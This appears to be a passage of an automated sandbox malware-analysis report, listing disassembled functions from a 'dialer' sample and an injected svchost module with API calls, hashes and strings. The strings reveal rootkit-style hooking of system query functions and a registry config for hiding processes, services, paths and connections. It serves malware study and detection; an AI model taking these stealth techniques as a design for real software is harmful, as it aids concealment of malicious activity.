                                                                          • Instruction Fuzzy Hash: 245114B6B11544DAEB16CF67F840BE827A1A759BE8F548212FB1D077B4DB38C986C700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                          • Instruction ID: 7f685618ca937b17e8a77ff3462c9f9b221cac2c692d946b3ecbcedae4a5563c
                                                                          • Opcode Fuzzy Hash: 0203b8193e6bd01d2269ae2997a65bc3a8e51b9bb463c4828a750bc6846778a9
                                                                          • Instruction Fuzzy Hash: 15F09671A14A4482E612EF6AB9417ED6360E75D7C1F50D221FF4E576A6DF3CD182C310

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000040.00000002.3278655687.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000040.00000002.3278387606.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3278920378.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279098990.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000040.00000002.3279282823.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_64_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                          • Instruction ID: fa24f775fc133e2fb8ddb0fda3fc4b66b3fc9b3ea8c54cca86470a464386792f
                                                                          • Opcode Fuzzy Hash: f5d6f4d19039afd7669e997dc8e3bf76fcc59d2d2e4ea198e7921c6a9a2d6c1d
                                                                          • Instruction Fuzzy Hash: 4F01B2B5705A0192FA1BDB53FE083E86360B76CBD1F454061EF0953AB4DF79C996C200

                                                                          Execution Graph

                                                                          Execution Coverage: 56.2%
                                                                          Dynamic/Decrypted Code Coverage: 0%
                                                                          Signature Coverage: 87.5%
                                                                          Total number of Nodes: 8
                                                                          Total number of Limit Nodes: 1

                                                                          Callgraph


                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000041.00000002.3278592017.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000041.00000002.3278536247.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3278592017.00000001404DC000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3278592017.0000000140500000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3278592017.0000000140503000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3278592017.000000014078B000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3278592017.000000014080D000.00000040.00000001.00020000.00000000.sdmp
                                                                          • Associated: 00000041.00000002.3280646006.0000000140847000.00000004.00000001.00020000.00000000.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_65_2_140000000_dialer.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                          • String ID:
                                                                          • API String ID: 1941872368-0
                                                                          • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                          • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                          • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                                          Execution Graph

                                                                          Execution Coverage:0.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:81
                                                                          Total number of Limit Nodes:2
                                                                          Execution graph (svchost, 81 nodes, 2 limit nodes; rendered edge list omitted): two roots. 257e107273c loops over LoadLibraryA. 257e10a1abc runs a Sleep/SleepEx loop that calls 257e10a1628 (GetProcessHeap/HeapAlloc, nine RegOpenKeyExW calls each followed by RegQueryInfoKeyW and RegEnumValueW value enumeration in 257e10a12bc/257e10a104c, then RegCloseKey) and compares the results with StrCmpIW/StrCmpW in 257e10a1598 and 257e10a152c (lstrlenW, StrCpyW); 257e10a14a4 and 257e10b6168/257e10b6180 are heap helpers.

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 16feaae96375266c24b17968b5a080657b5ae57e6ff703aba3d68dcbcffacad4
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: 2F711736358F1486EB15DF22FC5BB9963B4FB88B8AF001561EA4E47A68DF38C444C358

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: aade9cdc764c3959dde9a52c1c94ad6719753b48d41f7c1d1db878778cbbdd05
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: A411F93269CF008AFB6EA761FC0F79E2294B7A4347F4081A5D906496D0EF7CC044C62C

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000257E10A1628: GetProcessHeap.KERNEL32 ref: 00000257E10A1633
                                                                            • Part of subcall function 00000257E10A1628: HeapAlloc.KERNEL32 ref: 00000257E10A1642
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16B2
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A16DF
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A16F9
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1719
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1734
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1754
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A176F
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A178F
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17AA
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A17CA
                                                                          • Sleep.KERNEL32 ref: 00000257E10A1AD7
                                                                          • SleepEx.KERNELBASE ref: 00000257E10A1ADD
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A17E5
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1805
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1820
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A1840
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A185B
                                                                            • Part of subcall function 00000257E10A1628: RegOpenKeyExW.ADVAPI32 ref: 00000257E10A187B
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A1896
                                                                            • Part of subcall function 00000257E10A1628: RegCloseKey.ADVAPI32 ref: 00000257E10A18A0
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: d712d7bd41ce4f32cb42d1788969e2e1ab98e8c502d066c5c5fdd1db537eb6f4
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 9F31F871298F4582FF5E9726FE4B3E923A4AB44BC2F0858615E0987695FF34C451C228

                                                                          Control-flow Graph

                                                                          Control-flow graph (svchost, function 257e107273c-257e10729d0; rendered edge list omitted): four calls to 257e10729d4 at entry, then a loop around LoadLibraryA (257e1072858-257e10728d2).
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: e1821c6af69327561f239fb501c7fdcfb84665abf8bb743926d129d5342e2f1a
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 4E617572B49B9087DB5AEF14E80B73DB3A2F744BE5F188161DE4903788CA78D852C704

                                                                          Control-flow Graph

                                                                          Control-flow graph (svchost, function 257e10a2b2c-257e10a2f03; rendered edge list omitted): calls 257e10c2ce0, GetModuleHandleA, StrCmpNIW and lstrlenW, with subcalls to 257e10b6090, 257e10a199c, 257e10a1bbc, 257e10a3844, 257e10a152c and 257e10a85c0.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: a05134c9a34ff4c1d66afd38e5ef54d71b3b96099cc726008d15654598d14383
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 3BB1D032258F5482EB6EDF25EC4B7A963A5F744B86F0450A6EE0953B95DF34CC80C398
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 219ced55679ac893985f66a80f0dbd7178f5651cf27174fbf386b8ec505e6a56
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 29314A72249F808AEB65DF60F8867EE7360F784745F44802ADA4E57B98EF38C648C714
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 1239891234-0
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: 3bbfa850ad8dbd0e4a6fa2243018912ee9c80721fc4e2599e2c74e45bb328308
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 1531AD32258F8086EB69CF25FC467AE73A0F789755F504166EA9D43B98EF38C145CB04

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eced55502f1a75a026b6edf846e6a0891afcc2511a2fde73ec7a25957e053ce4
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 39517C32248F8486EB59CF66F84A75A77A1F389F8AF088524DE5907718DF3CC049C704

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 729b3f40a99a6114c8675349f500bf02ad9969b64215182506dd6b7d13de966c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 6C319574298F4AE1EA0FEFA5FCABBD46325B75434BF8054A3940902576DF3C8249C768

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: c413f792152c6e77bcdec011d4ce604bdbff46f8c7e2d41a41648d6f97dd56db
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7481476178CF0586F65FBB2ABC4F3B922D0E785782F5480A49A2647797DB38C8458B0C

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000257E10ACE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACEBC
                                                                          • SetLastError.KERNEL32 ref: 00000257E10ACED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000257E10AECCC,?,?,?,?,00000257E10ABF9F,?,?,?,?,?,00000257E10A7AB0), ref: 00000257E10ACF2C
                                                                            • Part of subcall function 00000257E10AD6CC: HeapAlloc.KERNEL32 ref: 00000257E10AD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF54
                                                                            • Part of subcall function 00000257E10AD744: HeapFree.KERNEL32 ref: 00000257E10AD75A
                                                                            • Part of subcall function 00000257E10AD744: GetLastError.KERNEL32 ref: 00000257E10AD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000257E10B0A6B,?,?,?,00000257E10B045C,?,?,?,00000257E10AC84F), ref: 00000257E10ACF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 44b74c0836ad876a2fac46d0e824247e53a8591ac7bd446e8d08f2f1267c89cf
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 3D4182703CDF4441FAAFA7357E5F3AD22815B447B2F6547A4A936066D6DE38C401872C

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: fd144254930c9193e2e316754b6910d439631fa1b8b54bcb3ad30ea55ac0c1ae
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: DB214F32658F4082FB19CB25F84A75A73A0F789BA6F504255EA6903BA8CF3CC149CF04

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: fa66f7741ebcd80bb86e54b7b1d1724f64a0d38ed48e78e569a20c50e363ff0f
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 46E1E572648F40CAEB6ADF65E84B39D77A0F748B99F100155EE8957B95CF34C081C714

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283125678.00000257E1070000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E1070000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e1070000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: eee8ddbebd137ff77ed4dfc8451c6d54f91bdde69a51e284d5195fa703101059
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: FFE1E472648F408AEB6AFF65E88B3AD37B0F7457A9F000156EE4A57B55CB34C490C704

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: cf054b1d2baf678fe8bdec6d8eaa147d53923dc8430d7e3ded5bb42e28665e5b
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 2741C632399F0091FA1FDB16BC0B79A2391B745BE1F5942659D1E87784EF3CC4458328

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 9cf63d37dc8258112caa738864d3c548755d6f27b2a305309498d83b3183a8b3
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: 27419F73218F84C6E765CF21F84A79E77A1F388B89F048129EA8907B58DF38D449CB14

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000257E10AC7DE,?,?,?,?,?,?,?,?,00000257E10ACF9D,?,?,00000001), ref: 00000257E10AD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: 3937cb81b8b0f971906db0413d64368154e2d1c9df82cae5cad0a14440eaf12d
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: C2118E707CCB8041FA6EA7357D5F36D71416B483F2F2443A4B93A066EADE78D4028728
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000042.00000002.3283290878.00000257E10A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000257E10A0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_66_2_257e10a0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
